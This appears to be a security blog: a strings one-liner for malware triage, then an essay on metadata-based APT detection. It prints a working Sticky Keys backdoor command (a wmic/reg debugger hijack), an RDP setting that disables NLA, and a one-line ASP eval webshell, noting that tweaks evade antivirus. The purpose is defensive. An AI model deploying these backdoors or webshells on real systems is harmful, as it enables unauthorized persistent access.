  • samples without hits

Yara Rule Analyzer

yarAnalayzer Screenshot


yarAnalyzer Github Repository

String Extraction and Colorization

To review the strings in a sample I use a simple shell one-liner that a good friend sent me once.
“strings” version for Linux

#!/bin/bash
(strings -a -td "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; strings -a -td -el "$@" | sed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

“gstrings” version for OS X (sudo port install binutils)

#!/bin/bash
(gstrings -a -td "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 A \2/' ; gstrings -a -td -el "$@" | gsed 's/^\(\s*[0-9][0-9]*\) \(.*\)$/\1 W \2/') | sort -n

It produces an output as shown in the above screenshot with green text and the description “Malware Strings” showing the offset, ascii (A) or wide (W) and the string at this offset.
For a colorization of the string check my new tool “prisma” that colorizes random type standard output.

Prisma STDOUT colorization

Prisma STDOUT colorization

Contact

Follow me on Twitter: @Cyb3rOps

APT Detection is About Metadata

People often ask me, why we changed the name of our scanner from “IOC” to “APT” scanner and if we did that only for marketing reasons. But don’t worry, this blog post is just as little a sales pitch as it is an attempt to create a new product class.
I’ll show you why APT detection is difficult – for the big players and spirited newcomers like us.

Metadata is the Key

Only recently I recognized and named the methods that we apply since we introduced the scoring system in our scanner product. Instead of looking at a file only by its content we collect numerous attributes and evaluate a score based on certain rules that indicate conspicuous features or anomalies.
What I recognized was that Metadata is the key to successful APT detection. Let me give you some examples.

The “Sticky Keys” Backdoor

During our investigations we found that the attackers used a simple backdoor that allowed them to avoid AV detection and use tools that were already available on the target systems. What they did was to copy a valid “cmd.exe” over the “sethc.exe” in the System32 folder in order to establish a backdoor that waits for the user pressing five times shift consecutively on a RDP logon screen and pops up a Windows command line running as LOCAL_SYSTEM. Another method sets the Windows command line as debugger for the stickykeys binary.

wmic /user:username /password:secret /node:system1 process call create
"C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe"
/v "
Debugger" /t REG_SZ /d "cmd.exe" /f"

With the necessary rights it is easy to install and difficult to detect.

StickyKeys Backdoor APT

APT Detection StickyKeys Backdoor


As I already said, an Antivirus engine won’t detect this backdoor as the content of the file is a valid Windows executable with an intact signature. Windows 7+ users won’t stumble over it as they have Network Level Authentication (NLA) enabled by default, which prompts the user for username and password before fully establishing a Terminal Services connection. Attackers modify their local “default.rdp” file and add “enablecredSSPsupport:i:0:1” in order to disable this behaviour.
APT detection therefore means the following:

  • Check system files like the stickykey binary for modifications – not by comparing MD5 hashes from whitelist databases like the NSRL, but by comparing the expected content for a certain file name with the actual content of the file. I described this method in a blog article and Chad Tilbury from Crowdstrike described how to apply this method using their CrowdResponse tool.
  • Identify “default.rdp” files on server systems that have NLA disabled. (Administrators shouldn’t do that)
  • Check if the Windows command line (cmd.exe) is registered as a debugger for any program

PsExec’s Evil Clone

I often use the example of the well-known Sysinternals tool “PsExec”, which is likewise used by administrators and APT groups. It doesn’t make much sense adding it to the indicators of compromise (IOCs) of your triage sweep although it may have played a substantial role in lateral attacker movement.
The human eye is able to distinguish between a PsExec that has been used for administration and a PsExec that has been used by the attackers. The essential difference, which enables us to distinguish between both versions does not lie in the content of the file but the Metadata.
Look at the following table and tell me which of both files is valid and which has been placed on the system by the attackers. Remember, the file content is the same – a MD5 hash of both files is equal.

File 1 File 2
MD5 aeee996fd3484f28e5cd85fe26b6bdcd aeee996fd3484f28e5cd85fe26b6bdcd
Filename PsExec.exe p.exe
Path C:\SysInternals C:\TEMP
Owner Administrators LOCAL_SYSTEM
Modified Time Stamp 2013-02-10 09:22:04 1970-01-01 00:00:00

It is not that difficult, isn’t it?
APT detection therefore means the following:

  • Imitating the human point of view by pulling together all Metadata connected with an element, be it a file, a process or eventlog message and evaluate the legitimacy of the element based on all available Metadata attributes

The Simplest Webshell

We often encounter so-called webshells that were placed in web server directories to establish a simple backdoor. Webshells can be very specific and therefore easy to detect. The C99 webshell is a good example for a PHP webshell, JspSpy is a well-known JSP webshell. Both are easily detected, even by Antivirus engines (see: C99 on VT, JSPSpy on VT).
However, APT groups tend to use two different types of webshells:

  • Tiny webshells
  • Code snippets with certain functions copied from legitimate software

There are a lot of well-known tiny webshells. The following one is my favorite. Add a space or change the request parameter “abc” to something else and the detection ratio is alarmingly low (Example). It allows an attacker to evaluate (execute) an arbitrary command on the web server. There are numerous blog posts and other articles describing what can be done with a webshell like this. However, the protection level provided by AV engines, firewalls and NIDS is almost zero.

<%eval request("abc")%>

Another method we discovered was the use code snippets copied from blog entries or tutorial pages that allowed them to use only certain functions like “file upload” or “directory listing”.
They often use a weakness in web applications to upload and run their own scripts or even whole application containers (.war). By placing a known webshell like the JspSpy webshell into that web server folder, they would run the risk of being detected. What they really need is a distribution point for their toolset or a simple tool to execute code on the server (like a tiny webshell). We’ve seen simple upload scripts that provide nothing more than a upload function, which they use to store their toolsets for lateral movement. A google search for “upload jsp” revealed various scripts they used in their attacks. It’s obvious that AV engines won’t detect this type of threat. How could they? The attackers abuse benign pieces of code to establish malicious backdoors.
APT detection therefore means the following:

  • Use the Metadata like file size, creation timestamp, file extension in combination with generic content detection rules – e.g. check for the string “eval” in a file smaller 40 byte and a script extension like “.jsp”.
  • Check the content of upload directories for the expected file types (and don’t use the extension to determine the file type)
  • Check web server processes for executables running in the web server directories – e.g. curl.exe in D:\Inetpub\wwwroot
  • Generate and send frequent reports on modified files within the web server directories

The Heavy Burden of Definite Detection

One could be tempted to believe that I wrote this article in order to degrade Antivirus engines, but this isn’t the case. Antivirus solutions are still play a key role and carry the heavy burden of definite detection. Their scan result has to be “thumbs up” or “thumbs down” as there is no middle ground.
Years ago they introduced signatures to detect “Potentially Unwanted Applications” (PUA). Users or administrators decide on what to do if one of these “dual use” tools has been found on a system. Handling thousands of the events generated by the Antivirus agents is a difficult task, even with a central console or SIEM integrated log files. It is easy to understand why PUA events do not play an important role in view of dozens of Trojan detections per day.

APT detection is the art of suspicion. A missing “stickykeys” string in the “sethc.exe” indicates a manipulation, a replaced system file. It is not a definite detection but the certainty that something is wrong.

Conclusion

Considering the given examples an attentive reader may be inclined to believe that Antivirus and simple IOC scanning (Triage) is not enough to defend against Advanced Persistent Threats. After the experiences of the last 3 years I have to confirm that assumption.
Who would recognize and report the execution of a “sethc.exe” on a server system, the “PUA/PsExec” message generate by the Antivirus or another JSP file on the web server?
I even doubt that so-called “APT solutions” are able to detect

  • a “.war”-file upload to a Tomcat server by the use of “tomcat/tomcat” as credentials,
  • encrypted file uploads,
  • lateral movement using PsExec, Powershell or WMIC and
  • “StickyKey” backdoor access via RDP.

An extensive security monitoring in form of a SIEM system allows you to detect a needle in the haystack but only if you are able to distinguish between straw and needles.

The question is: How can I define such soft indicators to detect the described anomalies? The OpenIOC framework already contains options to combine certain characteristics like filename and filesize, but rather than using it as a tool to describe anomalies it is often used to tighten the detection to the level of a hash value. I prefer hash values over “Name:PsExec.exe” combined with “Filesize:381816” because it doesn’t make you believe that you’re looking at a clever rule.
I therefore recommend the following:

  1. Assume compromise and start from there
    Ask yourself: How would I detect a breach? What if attackers already took control of the Windows Domain and worked with domain admin accounts? What if they worked with tools that my Antivirus is unable to detect?
  2. Use all Metadata you can get to determine the legitimacy of an element
    This does no only apply to files or processes in APT and IOC scanning, but also to the discipline of security monitoring.E.g. Select interesting Antivirus events based on various characteristics and not only the status that indicates if the malware has be removed or not. Consider the location of the malware (Temporary Internet files or System32 folder), the user account (Restricted user, Administrator or LOCAL_SYSTEM), the malware type (JS/Redirector or PUA/PasswordDump), system type (server or client workstation), detection time (02:00am with noone working in the night shift), detected form (in a RAR archive or extracted). Develop similar schemes for other log types. The most interesting ones are Antivirus, Proxy and Windows logs.
    Useful Links:
    SysForensics published an article about process anomaly detection, which was adapted to other OS versions and included in our THOR APT Scanner and my LOKI IOC Scanner.
    Use SysInternals Sysmon to enrich you Windows log data.
  3. Don’t create detection rules that are too tight but concentrate on filtering the false positives
    If you regard filtering false positives as a pain in the neck you’re probably using the wrong SIEM system. (Warning – product placement: I prefer Splunk over all others, especially with the Enterprise Security App installed)
  4. Use IOCs from published APT reports to enrich your detection rules
    We use the APT reports to create new rules in our customer’s SIEM systems and as input for our APT scanner THOR.Useful Links:
    APT Notes is a IOC repository with hundreds of reports from the last years. You can download the github repository from here.